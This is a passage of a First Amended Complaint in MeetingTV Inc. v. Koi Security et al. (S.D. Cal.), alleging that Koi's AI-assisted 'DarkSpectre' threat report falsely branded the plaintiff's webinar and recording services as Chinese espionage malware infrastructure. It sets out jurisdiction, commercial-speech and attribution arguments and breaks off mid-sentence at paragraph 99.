Bradley K. Moores (SBN: 193995)
brad@bradleymoores.com
6811 Alvarado Rd. 20
San Diego, CA 92120
(619) 742-8612
Attorney for Plaintiff,
MEETINGTV INC.

# UNITED STATES DISTRICT COURT

## SOUTHERN DISTRICT OF CALIFORNIA

| | |
|---|---|
| MEETINGTV INC.,<br><br>Plaintiff,<br><br>v.<br><br>KOI SECURITY INC.; KOI SECURITY LTD.; AMIT ASSARAF; IDAN DARDIKMAN; TUVAL ADMONI; GAL HACHAMOV; PALO ALTO NETWORKS, INC.; and DOES 1 – 25, Inclusive,<br><br>Defendants. | Case No.: 3:26-cv-01705-AJB-MMP<br><br>**FIRST AMENDED COMPLAINT FOR DAMAGES AND INJUNCTIVE RELIEF** |

**DISCLOSURE REGARDING GENERATIVE ARTIFICIAL INTELLIGENCE**

Pursuant to Southern District of California General Order 210, Counsel for Plaintiff hereby discloses that generative artificial intelligence was used in the preparation of this Pleading for legal research and initial drafting. In accordance with the Order, Counsel certifies that every legal citation, factual assertion, and argument contained herein has been independently verified for accuracy. Counsel further certifies that no confidential or non-public information was entered into any public generative AI system in the creation of this document.

///

**NATURE OF THE ACTION**

1. This action arises from Koi's reckless publication of an AI-driven cybersecurity report that falsely accused Plaintiff MeetingTV Inc. of criminal conduct including operating core infrastructure for a well-funded Chinese criminal organization running a large-scale malware and corporate espionage campaign. The false attributions were the direct product of Koi's unsupervised reliance on their proprietary "Wings" analytical platform, which generated erroneous correlations between the Plaintiff's business and an alleged cybercriminal actor they called DarkSpectre.

2. Koi knew, or recklessly disregarded, that such AI-assisted systems are widely recognized in the cybersecurity industry as prone to "hallucinations," false positives, and phantom linkages unless subjected to rigorous human forensic validation, manual attribution review, and independent corroboration. Despite this well-established risk, Koi published the unverified AI-generated conclusions as definitive investigative fact without adequate human oversight, basic attribution checks, or even contacting Plaintiff prior to publication.

3. The timing of the report coincided with Koi's high-stakes acquisition negotiations with Palo Alto Networks, Inc. Upon information and belief, Koi Defendants faced intense commercial pressure to demonstrate the "explosive" capabilities of their Wings AI platform to inflate corporate valuation ahead of the deal. In their haste, they elevated unverified AI outputs into a sensational 32-page marketing document — the DarkSpectre Report — and sacrificed Plaintiff's reputation and business as collateral damage.

4. The report described a corporate espionage campaign, "The Zoom Stealer" which was composed entirely of the Plaintiff's technology and assets. It falsely claimed 2.2 million users' worth of stolen corporate meeting data was collected and now in the hands of DarkSpectre. Koi Defendants linked The Zoom Stealer to DarkSpectre through a single non-existent browser extension they identified as "Twitter X Video Downloader"

3:26-cv-01705-AJB-MMP

but which did not appear among the extension IDs listed in the report itself and which they refused to supply information on when requested.

5. The report is owned by Defendant Koi Security Inc. (the Delaware U.S. entity) and was published on Koi's U.S.-facing website as integrated marketing and sales collateral for the Wings platform, complete with "Book a Demo" calls-to-action.

6. Koi's unverified AI outputs were rapidly ingested by automated threat intelligence systems worldwide, causing Plaintiff's legitimate services to be blocked globally as malware and command-and-control infrastructure. The resulting digital blockage, reputational devastation, and economic harm have been catastrophic and continue unabated.

## I.   INTRODUCTION

7. This case exposes the grave dangers of publishing unverified and unsupervised AI outputs in the high-stakes arena of cybersecurity threat intelligence. When automated analytical tools generate false correlations and those outputs are rushed into the marketplace as verified investigative fact — particularly under commercial pressure from an impending acquisition — legitimate businesses can be devastated overnight and the integrity of global digital infrastructure undermined.

8. Cybersecurity firm Koi Security Inc. and Koi Security Ltd. published a document titled "DarkSpectre: Unmasking the Threat Actor Behind 8.8 Million Infected Browsers" (the "Report") on December 30, 2025. This approximately 32-page marketing and sales Report presented as research was posted on Koi's blog and expressly used to promote its Wings AI platform, complete with embedded sales calls-to-action. Exhibit 1.

9. The Report falsely identified Plaintiff's domains, endpoints, and browser extensions as core infrastructure supporting "The Zoom Stealer," a purported corporate espionage campaign run by a "well-resourced Chinese criminal organization" they called DarkSpectre. It defined the entire Zoom Stealer campaign through Plaintiff's infrastructure and presented these AI-derived conclusions as definitive, verified fact.

10. The consequences were immediate and devastating. Within hours of publication, major cybersecurity vendors, internet service providers, and network operators worldwide ingested the Report's false Indicators of Compromise (IOCs) and began blocking Plaintiff's domains. The blocking commenced on December 31, 2025 — the very next day — and included, among others:

- Verizon, the largest U.S. mobile carrier, which began blocking meetingtv.us;
- Spectrum, the largest U.S. cable internet provider, which began blocking and labeling meetingtv.us as malware; Exhibit 14
- Avast, which began blocking and labeling traffic as phishing; Exhibit 30.
- Cloudflare, Fortinet, and Cisco Systems (Talos), each of which blocked and labeled Plaintiff's domains as malicious or malware; Exhibit 10, 11, 13.
- Palo Alto Networks, Inc., which classified meetingtv.us and webinarstvus.cloudfunctions.net as "Malware" and zoocorder.firebaseio.com as "Command-and-Control," classifications it continues to distribute. Exhibit 12.

11. As a direct and foreseeable result, Plaintiff's lawful services were widely classified as malicious infrastructure associated with cybercrime and Chinese espionage. New users could not access Plaintiff's platform, existing users and paid subscribers were blocked, and the blocking and reputational harm persist to this day. Plaintiff's name and domains remain persistently associated with malware, credential theft, and corporate espionage across security feeds, search results, forums, and AI systems.

12. Plaintiff is a legitimate United States technology company with no connection whatsoever to any malware campaign, threat actor, or criminal organization described in the Report. Plaintiff does not engage in corporate espionage, does not exfiltrate meeting data, and does not operate malicious infrastructure.

13. Plaintiff seeks damages, injunctive relief, and corrective measures to remedy the severe operational disruption and substantial economic harm caused by Defendants' reckless creation and publication of unverified AI outputs.

3:26-cv-01705-AJB-MMP

## II. JURISDICTION, PARTIES, AND VENUE

14. This Court has subject matter jurisdiction pursuant to 28 U.S.C. §§ 1331 and 1338(a) because this action arises under the Lanham Act, 15 U.S.C. § 1125(a). This Court has supplemental jurisdiction over Plaintiff's state law claims pursuant to 28 U.S.C. § 1367(a).

15. For clarity, the following definitions apply throughout this Complaint. "Koi Defendants" refers collectively to Koi Security Inc. and Koi Security Ltd., which operated as a single unified enterprise under the "Koi" brand (as detailed in Section II.A below) without meaningful distinction between the entities in their public-facing activities, publications, sales, marketing, decision-making, or internal operations. All allegations against 'Koi Defendants' apply jointly and severally to Koi Security Inc. and Koi Security Ltd. unless otherwise specified, based on their operation as a single unified enterprise. "Individual Koi Defendants" refers to Amit Assaraf, Idan Dardikman, Tuval Admoni, and Gal Hachamov. "Palo Alto" refers to Palo Alto Networks, Inc. References to "Koi Defendants" mean all of them acting in concert unless otherwise specified.

16. This Court has specific personal jurisdiction over Koi Defendants because those entities own the copyright in the DarkSpectre Report, directed its publication on the U.S.-facing koi.ai website, authored and/or approved its content through its CEO Amit Assaraf, and used the Report to drive commercial activity directed at the United States, including through its California-based sales leadership (Kuran Freymuth in San Francisco and Brady Nicholson in San Diego) who drove revenue from the commercial reports on the Koi website including The Report at issue here.

17. Koi Security Inc. purposefully availed itself of the California market by publishing false statements about a California company (Plaintiff), with foreseeable and actual harmful effects in this District. *Calder v. Jones*, 465 U.S. 783 (1984); *Ford Motor Co. v. Montana Eighth Judicial Dist. Court*, 592 U.S. 351 (2021).

///

///

3:26-cv-01705-AJB-MMP

**A. Koi Entities Operated as a Unified Enterprise Directed at California**

18.     Koi Security Inc. (a Delaware corporation) and Koi Security Ltd. operated as a single unified enterprise under the "Koi" brand. The entities acted in concert with centralized leadership, shared operations, and no meaningful distinction between them in public-facing activities, publications, sales, marketing, decision-making, or internal governance.

19.     Koi Defendants' own Terms of Use define "Company" to include both Koi Security Ltd. and Koi Security Inc. Exhibit 2.

20.     On LinkedIn and the koi.ai website, Koi maintains a single "Koi" organization with unified branding. All "Book a Demo" and "Get a Demo" inquiries from the Report and similar publications route directly to U.S.-based Koi Security Inc. personnel. Exhibit 3.

21.     The DarkSpectre Report is publicly attributed to Koi Security Inc., the United States entity, and includes "Copyright © 2025 Koi Security Inc." at publication date and "Copyright © 2026 Koi Security Inc." in its source code currently. Exhibit 4, Exhibit 5. This is not limited to the DarkSpectre Report. Every report publication on koi.ai bears copyright notices in the footer attributing ownership exclusively to Koi Security Inc., the United States Delaware entity. This consistent practice demonstrates that Koi Security Inc. owns and controls the entire body of Koi's commercial research and marketing content, further confirming its central role in the enterprise's operations and supporting attribution of conduct to the U.S. entity for jurisdictional purposes.

22.     Koi Security Inc. served as the revenue-generating core of the enterprise. Koi Security Inc. VP of Sales Amit Yampolsky "led all revenue functions at Koi" and was responsible for "scaling revenue from zero." He built the "revenue foundation" that "led directly to Koi's acquisition by Palo Alto in April 2026." Yampolsky's role extended beyond sales; he partnered with Product, Engineering, and Customer Success on enterprise Proof of Value engagements. This demonstrates that Koi Security Inc. was not

3:26-cv-01705-AJB-MMP

a mere subsidiary or sales appendage, but the commercial and operational heart of the unified Koi enterprise. Exhibit 6.

23.     California-based sales leaders Kuran Freymuth (San Francisco) and Brady Nicholson (San Diego) executed the U.S. revenue strategy and directly supported the commercial exploitation of research reports, including DarkSpectre. Exhibit 7, Exhibit 8. These facts belie any claim that Koi Security Inc. maintained only minimal contacts with California.

24.     Defendant Amit Assaraf served and continues to serve as CEO of both entities and exercised direct, centralized control over the DarkSpectre Report. In response to Plaintiff's notice, Assaraf stated he would "fix this asap internally," confirmed internal review with CTO Idan Dardikman, and later acknowledged that Koi had decided to "remove it and update the blog". Assaraf spoke on behalf of "Koi" as a single entity without corporate distinction. These actions constitute ratification and continued dissemination of the Report by the unified enterprise. Exhibit 9.

25.     Koi does not meaningfully segregate operations, decision-making, or commercial activities by entity. The Palo Alto acquisition treated Koi as a single functional unit. Because the entities operated and presented themselves as one enterprise, the jurisdictional contacts of each are properly attributed to the others. *See, Ranza v. Nike, Inc.*, 793 F.3d 1059, 1071–73 (9th Cir. 2015); *Williams v. Yamaha Motor Co.*, 851 F.3d 1015, 1021–22 (9th Cir. 2017).

**B. Koi Defendants Expressly Aimed Their Conduct at California's Cybersecurity Infrastructure and a California-based Plaintiff**

26.     The conduct giving rise to this action—Koi Defendants' publication of the DarkSpectre Report and associated Indicators of Compromise ("IOCs")—was expressly aimed at California.

27.     Koi Defendants operate in the cybersecurity threat intelligence industry. In this industry, published IOCs and threat intelligence reports are designed to be ingested,

3:26-cv-01705-AJB-MMP

relied upon, and operationalized by cybersecurity vendors and automated enforcement systems worldwide.

28.    Koi Defendants knew, or recklessly disregarded, that their IOC designations would be ingested and acted upon by major California-based cybersecurity companies that dominate the global threat intelligence ecosystem, including Palo Alto, Cisco Systems, Inc., Fortinet, Inc., Cloudflare, Inc., CrowdStrike, Okta, and Google's Mandiant division. California is widely recognized as the epicenter of the cybersecurity industry, and these companies operate critical IOC ingestion pipelines and automated blocking systems used worldwide.

29.    Many of these California-based entities in fact ingested Koi Defendants' false and misleading IOC designations and, in reliance upon them, classified Plaintiff's domains, infrastructure, and software as malicious, including as malware and command-and-control infrastructure. Exhibits 10-13.

30.    As a direct and foreseeable result, Plaintiff's services were blocked, filtered, or otherwise impaired by such California-based entities and their downstream customers, causing substantial harm within California and nationwide. The resulting blocking and classification actions were not incidental — they were the intended and foreseeable operational effect of Koi Defendants' conduct.

31.    Plaintiff is headquartered in California, and Koi Defendants knew or should have known that Plaintiff was a California-based company. Plaintiff's location was readily ascertainable, and Koi Defendants were directly notified by Plaintiff of the falsity of their statements, yet failed to take adequate corrective action. Koi Defendants therefore knew, or recklessly disregarded, that the harm caused by their conduct would be suffered primarily in California.

32.    Koi Defendants did not merely publish generalized content to a global audience. They specifically identified Plaintiff—a California-based company—as part of a criminal enterprise involving malware distribution, corporate espionage, and unlawful data exfiltration. This targeted attribution, combined with the California-centric nature of

the cybersecurity ecosystem, constitutes express aiming at this forum under *Calder v. Jones*, 465 U.S. 783, 789–90 (1984).

**C. Koi Defendants' Contacts with California Include Substantial Commercial Activity**

33.     Koi Defendants deliberately cultivated and exploited the California market. A substantial twenty percent (20%) of customers for Koi's Wings AI security platform are located in California.Koi Defendants' IOC lists are ingested by California cybersecurity companies including, but not limited to, Palo Alto, CloudFlare, Fortinet, and Cisco. Exhibits 10-13.

34.     Koi Defendants maintain substantial personnel and commercial operations in California employing multiple personnel. Defendant Koi Security Inc. employed multiple senior sales leaders in California during the relevant period surrounding the DarkSpectre Report's publication and Koi's acquisition by Palo Alto. Kuran Freymuth served as Director of Sales Development for Koi in San Francisco, California. In this role, Freymuth managed a sales team, broke pipeline generation records, and unlocked significant enterprise opportunities, including multiple engagements with Fortune 500 companies. Exhibit 7.

35.     Additionally, Brady Nicholson served as an Enterprise Account Executive for Koi, based in San Diego, California—the precise judicial district in which this action was filed. Nicholson generated "over $3M in pipeline and directly contributing to meaningful closed revenue. Exhibit 8.

36.     These California-based sales leaders were not incidental or junior employees. They formed part of Koi's core U.S. go-to-market infrastructure under the direction of VP of Sales Amit Yampolsky and directly supported the commercial exploitation of Koi's research reports, including the DarkSpectre Report, as sales collateral. Their presence and activities in California further demonstrate Koi Security Inc.'s purposeful availment of the California market and continuous commercial contacts with this forum.

3:26-cv-01705-AJB-MMP

37.    These California-based employees directly contradict any assertion in Koi Security Inc. CEO Amit Assaraf's Declaration that Koi Corp. maintained only a "single… junior salesperson" in California. Also absent from the declaration was the Koi Security Inc employee based in the forum. Such mischaracterization of material jurisdictional facts further supports treating the Koi entities as a single enterprise for purposes of jurisdiction and liability.

38.    Koi Defendants have solicited and obtained substantial investment from California-based venture capital firms, including NFX, to support product development and market expansion, including within California. Exhibit 16.

39.    Koi Defendants' senior leadership and personnel—including Chief Executive Officer Amit Assaraf, Vice President of Sales Amit Yampolsky, Head of Marketing Daniel Slavin, and others—have actively marketed and promoted Koi's product within the California technology ecosystem, including on Product Hunt, a California-based platform. Exhibit 30.

40.    These contacts reflect intentional, sustained, and revenue-generating engagement with California and are neither random nor attenuated.

41.    Koi Defendants were acquired by California-based Palo Alto. Exhibit 20.

**D. Plaintiff's Claims Arise Out of and Relate to Koi Defendants Forum Contacts**

42.    Plaintiff's claims arise directly out of and relate to Koi Defendants' California-directed activities, including their publication and dissemination of the Report, their integration of that Report into a revenue-generating commercial funnel directed at U.S. customers, and their ongoing promotion and distribution of the Report through unified marketing and sales channels.

43.    Koi Defendants' commercial exploitation of the Report through a United States-based sales funnel directed at California customers further demonstrates purposeful availment of this forum.

3:26-cv-01705-AJB-MMP

44.    The United States Supreme Court has confirmed that specific jurisdiction exists where claims "arise out of or relate to" a defendant's forum contacts. *See, Ford Motor, supra.*, 592 U.S. at 358–59.

**E. Jurisdiction Over Palo Alto**

45.    Defendant Palo Alto is headquartered in California and is subject to general and specific personal jurisdiction in this forum.

46.    Palo Alto acquired Koi and has continued, adopted, ratified, and/or benefited from the publication, dissemination, and enforcement of the false IOC designations and related statements at issue in this action. Exhibit 20.

47.    Palo Alto's products, services, and threat intelligence systems have ingested, incorporated, and/or continued to distribute the IOC designations originally published by Koi, resulting in ongoing classification of Plaintiff's infrastructure as malicious.

48.    Palo Alto's conduct constitutes independent tortious activity within California and provides an independent basis for jurisdiction.

49.    In addition, Palo Alto is subject to jurisdiction as a successor to Koi because it has continued Koi's business operations, integrated Koi's technology and intelligence into its systems, and benefited from the conduct at issue.

**F. Jurisdiction Over Individual Koi Defendants**

50.    Each individual defendant personally participated in the wrongful conduct. Defendant Amit Assaraf, Chief Executive Officer of both Koi Security Inc. and Koi Security Ltd., exercised direct executive control over the creation, review, publication, dissemination, and post-publication modification of the DarkSpectre Report. In response to Plaintiff's notice of falsity, Assaraf personally stated he would "fix this asap internally" and confirmed that "we've checked this internally," copying CTO Idan Dardikman. Exhibit 9.

51.    Defendant Idan Dardikman, Chief Technology Officer, personally oversaw the AI-powered analytical tools and Wings platform that generated the false correlations, non-existent "Twitter X Video Downloader" software, and IOC designations at issue.

3:26-cv-01705-AJB-MMP

52. Defendants Tuval Admoni and Gal Hachamov personally participated in the research, analysis, drafting, approval, and promotion of the Report and the associated IOCs.

53. Each individual defendant knew, or recklessly disregarded, that the false statements and IOCs would be ingested and acted upon by California-based cybersecurity companies, including Palo Alto, and would cause substantial harm to Plaintiff, a known California-headquartered company.

54. Under *Calder v. Jones*, 465 U.S. 783 (1984), each individual defendant is subject to specific personal jurisdiction in California based on their intentional tortious conduct expressly aimed at this forum.

**G. Exercise of Jurisdiction Is Reasonable**

55. The exercise of jurisdiction is reasonable and consistent with traditional notions of fair play and substantial justice. California has a strong interest in adjudicating disputes involving harm to a California-based company and regulating misconduct affecting its cybersecurity and technology markets. *See, Burger King Corp. v. Rudzewicz,* 471 U.S. 462, 476–78 (1985).

56. Koi Defendants have purposefully availed themselves of the benefits of conducting business in California and cannot avoid jurisdiction where their conduct has caused substantial harm within the forum.

**H. Venue**

57. Venue is proper in this District pursuant to 28 U.S.C. § 1391(b) because a substantial part of the events giving rise to the claims occurred in this District and Koi Defendants are subject to personal jurisdiction here.

**III.    PLAINTIFF'S BUSINESS**

58. Plaintiff MeetingTV, Inc. is a technology company focused on video meetings. Plaintiff operates a webinar search engine. The webinars indexed by Plaintiff's search engine are public in nature and are open to any member of the public to register and view. To facilitate its search engine, Plaintiff aggregates and indexes publicly

3:26-cv-01705-AJB-MMP

available webinar URLs, metadata, titles, descriptions, dates, times, and registration links. These publicly available webinars are primarily from businesses, academic institutions, government agencies, and non-profits. Plaintiff's platform enables users to search by title, host, or words spoken in a webinar, and allows users to browse, preview, and receive webinar recommendations. Webinar hosts receive free services including a dedicated home page, chapters, slide show, and promotional videos, and may also pay to promote their webinar to a wider audience.

59.    Plaintiff also provides a personal recording service enabling subscribers to record their own meetings called Zoomcorder. Zoomcorder records only at the direction of the user with credentials provided by the user, and such credentials are used solely to facilitate the recording requested by the user. Recordings are made available only to the authorized subscriber who initiated the recording and are automatically deleted after a limited retention period of approximately three weeks. Zoomcorder recordings are not included in the search engine, and any credentials collected to facilitate personal recording are never used for any other purpose.

60.    Plaintiff's backend infrastructure consists of lawful and industry-standard cloud-based services, including Google Cloud services used for legitimate data collection, processing and video services. Plaintiff does not engage in any of the malicious or unlawful conduct described in the Report and operates a legitimate platform.

61.    Plaintiff's business model depends entirely upon its reputation as a secure, lawful, and trustworthy provider of communication and information services, and any association of Plaintiff with malware, espionage, credential theft, or criminal infrastructure would foreseeably cause severe reputational, operational, and economic harm to Plaintiff's business.

## IV.    DEFENDANTS' BUSINESS

62.    Koi Defendants hold themselves out as a professional cybersecurity firm engaged in threat intelligence, malware attribution, and investigative security reporting. They publish material that purports to identify malicious software, criminal threat actors,

3:26-cv-01705-AJB-MMP

and compromised digital infrastructure integrated with promotional messaging and sales actions.

63.    These publications are distributed globally through Koi Defendants' website and social media channels. Koi Defendants represent that their publications are intended to be relied upon by enterprises, security vendors, network operators, and developers.

64.    Defendant Koi Security Inc. owns the copyright to the entire library of Koi's research and marketing reports, each of which carries "Copyright © [Year] Koi Security Inc." notices. Exhibit 5.

65.    Koi Defendants market and promote a proprietary analytical platform or engine referred to as "Wings." Koi Defendants publicly represent that Wings employs artificial intelligence, automated analysis, correlation engines, and other AI-assisted technologies to detect and identify relationships among browser extensions, software artifacts, domains, internet infrastructure, campaigns, and threat actors. Upon information and belief, Koi Defendants relied upon Wings and related AI-assisted systems in the research, analysis, and generation of the DarkSpectre Report at issue in this action.

66.    Koi Defendants also own and operate a software and infrastructure risk analysis database known as Koidex, accessible at dex.koi.security. Koi Defendants hold Koidex out as a security evaluation tool that analyzes and assesses the safety and risk level of software extensions, code packages, libraries, and related digital artifacts.

67.    Koi Defendants' business model treats suspected cyber threats as sales opportunities embedding language into publications that promotes Koi's expertise, the capabilities of their commercial services such as Wings and invites sales inquiries. Those inquiries route through the unified sales infrastructure to the U.S.-based Koi Security Inc. personnel.

68.    Defendant Palo Alto is a leading California-headquartered cybersecurity company that provides AI-powered security platforms, threat intelligence, next-generation firewalls, cloud security, endpoint protection, and URL filtering services to enterprises worldwide. Palo Alto's products and services are designed to ingest, analyze,

and act upon third-party and internal threat intelligence, including Indicators of Compromise (IOCs) and malware/command-and-control classifications, which are then distributed through its commercial offerings and enforcement systems.

## V.   KOI DEFENDANTS' PUBLICATIONS CONSTITUTE COMMERCIAL SPEECH

69.   Koi Defendants are in the business of developing, marketing, and selling cybersecurity products and services, including their proprietary "Wings" AI analytical platform and associated threat intelligence offerings. The DarkSpectre Report is not independent research or academic analysis. It is a marketing asset created, structured, and distributed as part of Defendants' revenue-generating activities and is expressly designed to promote Koi's Wings platform and drive sales.

70.   The Report employs high-intensity scare rhetoric to create market urgency — declaring a "well-resourced Chinese criminal organization" engaged in "corporate espionage" and "stealing corporate meeting intelligence" — while positioning Koi and its AI-native platform as the singular solution.  "This is the first time we've found a well-funded criminal organization responsible for several of the largest and most sophisticated campaigns we've ever uncovered," and asserts that only an "AI-native" platform like Wings can detect such threats. Other security tools are portrayed as inadequate.

71.   Koi has published <u>more than 30 similar reports</u> using the identical formula: sensationalized threat exposés highlighting massive campaigns and sophisticated actors, followed by explicit positioning of the Wings platform as the uniquely effective AI-native solution, and concluding with prominent "Book a Demo" calls-to-action that route directly into Koi Security Inc.'s United States-based sales funnel managed by California sales personnel. Exhibit 18, Exhibit 3.

72.   Koi Security Inc.'s CEO Amit Assaraf has personally authored multiple such reports containing integrated sales pitches, including "When Both Marketplaces Fall," "A Month of Malware in the Chrome Web Store," and "When Chrome Extensions Turn Against Us." Exhibit 17.

3:26-cv-01705-AJB-MMP

73. These statements were made in the course of Koi's business for the purpose of promoting and selling its goods and services to its core audience of enterprises, security vendors, network operators, and developers who rely on threat intelligence when evaluating cybersecurity solutions. The Report's integration into Koi's systematic lead-generation machinery and its direct contribution to revenue generation and acquisition valuation confirm its commercial purpose.

74. The DarkSpectre Report is a copyrighted commercial asset owned and controlled by Defendant Koi Security Inc., the U.S. Delaware entity. Its footers prominently display "Copyright © 2025 Koi Security Inc. All rights reserved" (initial version) and "Copyright © 2026 Koi Security Inc. All rights reserved" (updated version). Exhibit 4, Exhibit 5.

75. This ownership is not unique to the DarkSpectre Report. Koi Security Inc. holds the copyright for every Koi report with each bearing identical "Copyright © [Year] Koi Security Inc." notices. This systematic attribution confirms that Koi Security Inc. is the owner and primary commercial beneficiary of Koi's entire content and marketing operation.

## VI. THIS ACTION IS EXEMPT FROM CALIFORNIA'S ANTI-SLAPP STATUTE UNDER THE COMMERCIAL SPEECH EXCEPTION (CAL. CODE CIV. PROC. § 425.17(c))

76. Under *Bolger v. Youngs Drug Products Corp.*, 463 U.S. 60 (1983), and *Kasky v. Nike, Inc.*, 27 Cal. 4th 939 (2002), the DarkSpectre Report constitutes commercial speech. Because Plaintiff's claims arise from representations of fact made by a business in the course of promoting its own products and services as part of a systematic, template-driven advertising campaign, this action falls squarely within the commercial speech exemption to California's anti-SLAPP statute. Cal. Code Civ. Proc. § 425.17(c).

77. The Report therefore receives reduced First Amendment protection and is fully actionable under the Lanham Act, California's False Advertising Law (Bus. & Prof.

Code § 17500), and Unfair Competition Law (Bus. & Prof. Code § 17200). The Report's commercial purpose also supplies strong evidence of recklessness: motivated by the need to demonstrate the value of its AI platform during acquisition negotiations, Koi published unverified AI-generated correlations as definitive investigative fact, prioritizing marketing impact over accuracy and verification.

## VII.   THE ZOOM STEALER CAMPAIGN

### A. Koi's Allegations

78.   In the DarkSpectre Report, Koi labeled an alleged malware campaign "The Zoom Stealer" and defined it almost entirely through Plaintiff's own infrastructure. Koi alleged that Plaintiff's domains — meetingtv.us, webinarstvus.cloudfunctions.net, and zoocorder.firebaseio.com — served as core command-and-control and data-exfiltration infrastructure. Koi further alleged that Plaintiff's browser extensions were malicious tools responsible for stealing corporate meeting intelligence, credentials, participant lists, and other sensitive data from approximately 2.2 million users. This campaign, according to the Report, constituted "corporate espionage infrastructure" and formed part of the larger "well-resourced Chinese criminal organization" called DarkSpectre. Koi published these accusations as verified investigative fact and included Plaintiff's domains and extensions as Indicators of Compromise ("IOCs"), triggering widespread automated blocking.

### B. Plaintiff's Software Was Legitimate, Disclosed, and Publicly Transparent

79.   Plaintiff's software consisted of legitimate, publicly available Chrome browser extensions that were transparently disclosed to users and approved by Google for availability in the Chrome Web Store.

80.   The extensions openly disclosed their core functionality in their publicly available descriptions. For example, the Chrome Audio Capture extension explicitly stated that "a RECORD button may be available" on certain webinar pages and that "webinar recommendations may appear on certain video meeting pages for high quality webinars from Meeting TV." These disclosures informed users that the software would

17

interact with video meeting pages to provide recording and recommendation features. Exhibit 21.

81.    Plaintiff's recommendation feature operated similarly to widely accepted systems used by major platforms such as Amazon, which display contextual suggestions based on user behavior. The extensions used standard technical signals — such as the presence of a webinar page — to deliver relevant content to users. Reading page URLs for such contextual functionality is a routine and legitimate practice employed by countless mainstream browser extensions and applications, including Google Chrome itself.

82.    All extensions were distributed exclusively through the official Chrome Web Store. During installation, users received clear, affirmative disclosures of the specific permissions requested, including the domains the extensions would access. Users were required to actively accept these permissions before installation could proceed. Such transparent disclosure is fundamentally inconsistent with malicious software, which typically conceals its operations from users.

83.    Koi reviewed Plaintiff's public disclosures. The Report itself included screenshots from the extension descriptions. Nevertheless, Defendants ignored these clear disclosures and falsely asserted that the software had "no legitimate reason" to interact with meeting-related URLs. Defendants further criticized the use of WebSocket connections for timer functionality, even though this was a necessary technical mechanism to deliver the advertised features.

84.    Critically, the Report itself acknowledged the legitimate nature of Plaintiff's extensions, stating that they "were functional tools that delivered real value," that "users got what was advertised," and that the extensions "earned trust and positive reviews." These admissions directly contradict Defendants' portrayal of the same software as malicious espionage infrastructure.

85.    Each extension also provided clear developer contact information. Despite accusing Plaintiff of operating corporate espionage infrastructure as part of a Chinese

3:26-cv-01705-AJB-MMP

criminal organization, Defendants never contacted Plaintiff to inquire about the software's design, functionality, or purpose prior to publication.

86.    Defendants' decision to characterize fully disclosed, user-consented, and publicly transparent functionality as malicious spyware constitutes a knowing or reckless misrepresentation of legitimate business operations.

## VIII.    BY DEFINING "THE ZOOM STEALER" ENTIRELY THROUGH PLAINTIFF'S INFRASTRUCTURE, KOI NECESSARILY ATTRIBUTED PLAINTIFF TO THE DARKSPECTRE CRIMINAL ENTERPRISE

87.    Koi cannot escape liability by labeling DarkSpectre a "Chinese threat actor" while simultaneously defining the associated Zoom Stealer campaign as Plaintiff's own infrastructure and operations.

### A. The Zoom Stealer Campaign Is Identical to Plaintiff

88.    The Report does not describe Zoom Stealer as an abstract or unidentified threat. It defines the campaign concretely through specific, identifiable components:

- Plaintiff's domains: meetingtv.us, webinarstvus.cloudfunctions.net, and zoocorder.firebaseio.com (listed under "IOCs – Domains – The Zoom Stealer");
- Plaintiff's browser extensions and software artifacts (the large majority of those identified as part of the campaign); and
- Plaintiff's backend infrastructure used for meeting data handling and recording.

89.    The browser extensions identified in the Report were overwhelmingly controlled by Plaintiff and were understood in context by readers and security vendors as part of Plaintiff's software ecosystem.

90.    No other infrastructure or operator is identified. Without Plaintiff's domains and code, the system Koi describes as "The Zoom Stealer" cannot function. In substance and operation, "The Zoom Stealer" is Plaintiff.

///

///

///

19

3:26-cv-01705-AJB-MMP

**B. Linking Zoom Stealer to DarkSpectre Attributes Plaintiff to a Chinese Criminal Espionage Operation**

91.    The Report repeatedly declares that Zoom Stealer is part of a single "highly organized operation" called DarkSpectre — a "well-resourced Chinese criminal organization" responsible for corporate espionage and stealing "2.2 million users' worth of meeting data."

92.    By defining Zoom Stealer entirely through Plaintiff's California-based, American infrastructure and then folding it into a "Chinese criminal organization," Koi necessarily communicated that Plaintiff was operating or supporting Chinese-linked corporate espionage. In the cybersecurity ecosystem, this is an exceptionally damaging attribution. A reasonable reader — particularly security vendors, automated systems, and enterprise customers — would understand Koi's statements to mean that Plaintiff knowingly participated in or facilitated a foreign criminal espionage campaign against U.S. companies.

93.    In the field of cybersecurity threat intelligence, identifying specific domains, endpoints, and code as operational components of a named malicious campaign is itself an attribution of responsibility. *See Blatty v. New York Times Co.*, 42 Cal. 3d 1033, 1042 (1986).

**C. The Fabricated "Twitter X Video Downloader" Pivot Compounds the Attribution**

94.    Koi's single-actor theory rested on a fabricated technical "pivot" — a single piece of software they repeatedly identified as the "Twitter X Video Downloader" extension. This alleged extension was described as the critical bridge connecting the Zoom Stealer campaign (defined entirely by Plaintiff's infrastructure) to ShadyPanda, core DarkSpectre infrastructure.

95.    The Report referenced this purported extension twice in the text and featured it prominently in an accompanying diagram as the discovered pivot point. The diagram included explicit lines connecting ShadyPanda to the "Twitter X Video Downloader"

extension and from that extension to the Zoom Stealer campaign. The accompanying graphic asserted that the extension "connects to infinitynewtab AND steals meeting data" (emphasis in original) and communicated with infinitynewtab.com — which Defendants identified as "core ShadyPanda infrastructure." Defendants presented this claimed communication as concrete evidence that the campaigns shared backend infrastructure, thereby unifying them under the DarkSpectre umbrella. Exhibit 1 at 5-6, 9.

96.     No extension matching the name "Twitter X Video Downloader," the described functionality, or the claimed communications appears among the 17 extension IDs actually listed in the Report. This non-existent linkage was not a minor oversight or a single typo — it was the linchpin that transformed discrete and unrelated technical observations into a single, unified Chinese criminal espionage conspiracy that expressly included Plaintiff's infrastructure.

**D. Koi's Post-Publication Conduct Confirms the Attribution**

97.     After Plaintiff notified Koi of the falsity, Koi removed some (but not all) of Plaintiff's artifacts from the IOC list and stated there was "no evidence" linking meetingtv.us to malicious activity. Yet Koi left intact the broader narrative describing Zoom Stealer's espionage purpose and its integration into DarkSpectre. This partial, internally incoherent "update" demonstrates that Koi itself understood the original Report as directly attributing Plaintiff's infrastructure to the Chinese criminal campaign. Exhibit 22.

**E. The Statements Are "Of and Concerning" Plaintiff**

98.     Taken together and in context, Koi's statements are plainly "of and concerning" Plaintiff. They are actionable as defamation per se.

**IX.   THE FABRICATED "TWITTER X VIDEO DOWNLOADER" PIVOT: THE FALSE LINK THAT COLLAPSED THE ENTIRE DARKSPECTRE NARRATIVE**

99.     A central pillar of Koi's "single unified criminal organization" theory was a claimed technical pivot connecting the Zoom Stealer campaign (defined entirely by

3:26-cv-01705-AJB-MMP

